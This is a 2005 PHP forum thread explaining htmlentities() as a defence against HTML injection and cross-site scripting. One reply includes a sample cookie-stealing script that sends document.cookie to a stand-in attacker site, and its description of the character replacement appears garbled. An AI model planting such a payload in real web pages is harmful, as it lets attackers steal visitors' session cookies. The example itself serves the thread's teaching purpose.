Page 1 of 1
The HTML Entities Function
Posted: Wed Sep 14, 2005 2:29 pm
by pilau
Htmlentities... right.
Can somebody explain what it does actually?
Why do we need it? In what cases?
TIA
Posted: Wed Sep 14, 2005 2:32 pm
by josh
turns anything that is a special html character into it's entity, entities are like html tags that cause html to be outputted "literally" to the browser, so that instead of <b>making text bold</b> you just want the bold html tag to output plainly to the screen. It's useful in posting examples of html source but is also a security necessity against XSS (allowing other users to 'inject' html into your page)
Posted: Fri Sep 16, 2005 12:03 pm
by pilau
Great, thanks mate.
Posted: Mon Sep 19, 2005 8:18 am
by Jenk
An example of HTML injection/XSS attack (Cookie stealing)
Code: Select all
<script language="JavaScript">
window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);
</script>
Now if these forums did not use htmlentities (or similar function) then
http://www.cookiestealers.com would have the contents of the cookies from the viewers of this thread.
But because php's htmlentities() replaces '<' with '<' and '>' with '>' (less than and greater than respectively) the code becomes, as jshpro2 pointed out, literal.
There are other characters that are changed aswell, " (double quote) for example.
Posted: Mon Sep 19, 2005 9:11 am
by pilau
Cool. thanks you.
Posted: Tue Sep 20, 2005 7:56 am
by $var
that's fun.